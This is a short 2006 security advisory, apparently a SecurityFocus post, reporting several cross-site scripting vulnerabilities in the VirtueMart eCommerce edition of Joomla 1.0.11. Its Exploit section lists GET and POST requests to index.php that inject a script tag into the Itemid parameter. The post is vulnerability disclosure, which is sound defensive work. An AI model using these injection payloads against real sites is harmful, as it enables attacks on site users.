VirtueMart Joomla eCommerce Edition CMS Multiple XSS Vulnerabilities Sep 27 2006 08:11AM
Base64 (base640 gmail com)
VirtueMart Joomla eCommerce Edition CMS Multiple XSS Vulnerabilities

Status: Reported to the Vendor [09/26/2006]
Class: Input Validation Error
Severity: Low

Software Description:
************************************************************************
*****
VirtueMart (formerly known as mambo-phpShop) is an Open Source
E-Commerce solution to be used together with a Content Management
System (CMS) called Joomla!

Vulnerability Description:
************************************************************************
*****
Multiple cross-site scripting vulnerabilities exist in the Joomla
eCommerce edition software provided by VirtueMart.

Vulnerable Software:
************************************************************************
*****
Joomla 1.0.11 eCommerce Edition (prior versions may also be vulnerable)

Exploit:
************************************************************************
*****
GET: index.php
option=com_contact&Itemid="><script>alert('XSS');</script>
POST: index.php
subscriber_name=1&email=1&task=subscribe&Itemid="><script>alert('XSS');<
/script>

Solution:
************************************************************************
*****

None at this time.

Credits:
************************************************************************
*****
Discovered by Adrian Castro

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus